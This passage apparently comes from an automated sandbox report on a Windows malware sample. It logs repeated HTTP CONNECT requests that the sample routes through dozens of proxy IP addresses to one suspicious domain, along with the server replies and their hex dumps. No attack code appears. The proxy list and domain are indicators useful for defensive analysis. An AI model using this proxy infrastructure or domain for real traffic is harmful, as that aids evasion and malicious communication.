                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      738192.168.2.451623149.50.238.11480806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.959777117 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.359148026 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      739192.168.2.452399190.12.95.170470296812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.960078955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.195005894 CET19INHTTP/1.1 200 OK
                                                                                                      Feb 23, 2024 09:45:26.795005083 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      740192.168.2.452412203.24.103.131806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.966795921 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.054394960 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:22 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      741192.168.2.452407172.245.16.47156736812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.967344999 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      742192.168.2.452230161.189.49.2631286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.971096039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.374891996 CET146INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 23 Feb 2024 08:45:22 GMT
                                                                                                      Content-Type: text/plain
                                                                                                      X-Powered-By: PHP/5.4.7
                                                                                                      Server: squid/4.10
                                                                                                      Content-Length: 0
                                                                                                      Feb 23, 2024 09:45:22.757133007 CET628INHTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 509<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy54-HG100-2</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></html
                                                                                                      Data Raw:
                                                                                                      Data Ascii:
                                                                                                      Feb 23, 2024 09:45:22.758502007 CET628INHTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 509<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy50-HG100-2</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></html
                                                                                                      Data Raw:
                                                                                                      Data Ascii:


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      743192.168.2.45237845.11.95.16560316812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.971218109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      744192.168.2.452416104.17.50.45806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.981338978 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.069046021 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:22 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      745192.168.2.452281102.132.57.9080806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.982512951 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      746192.168.2.452437104.17.171.79806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.988599062 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.076548100 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:22 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      747192.168.2.452444104.22.14.48806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.997699022 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.085469007 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:22 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      748192.168.2.45229243.133.136.20888006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.999202967 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.336400032 CET308INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.22.1
                                                                                                      Date: Fri, 23 Feb 2024 08:45:22 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 153
                                                                                                      Connection: keep-alive
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      749192.168.2.452358200.43.231.841536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.001610041 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      750192.168.2.45234458.234.116.19781936812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.012149096 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      751192.168.2.45169827.75.152.19110806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.012151957 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      752192.168.2.45240898.162.25.2341456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.017430067 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      753192.168.2.451595171.244.140.160374006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.022241116 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      754192.168.2.45245151.79.87.144412306812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.022241116 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.475070953 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.866152048 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.680557966 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.178417921 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.683005095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.179008007 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      755192.168.2.45240972.206.181.12341456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.025372982 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      756192.168.2.452426107.180.89.55129406812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.035778999 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.475071907 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      757192.168.2.4516595.252.23.24910806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.047655106 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.178188086 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.179192066 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.178991079 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      758192.168.2.45236052.172.1.18631286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.049822092 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      759192.168.2.451635159.223.71.71641516812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.063043118 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.893145084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.122270107 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.589677095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.647156000 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      760192.168.2.45244951.15.242.20288886812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.068325043 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.226687908 CET309INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.21.6
                                                                                                      Date: Fri, 23 Feb 2024 08:45:22 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 157
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 31 2e 36 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.21.6</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      761192.168.2.45123437.192.118.8010806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.070648909 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      762192.168.2.452414146.59.2.185806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.077387094 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      763192.168.2.452366102.213.22.5780806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.080425024 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      764192.168.2.45206674.119.144.6041456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.096631050 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      765192.168.2.45241192.255.164.16641456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.107445002 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      766192.168.2.451376103.230.126.123578216812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.107773066 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      767192.168.2.452440212.31.100.13841536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.111365080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      768192.168.2.452477203.23.103.127806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.119795084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.210205078 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:22 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      769192.168.2.451652129.154.225.16381006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.124172926 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
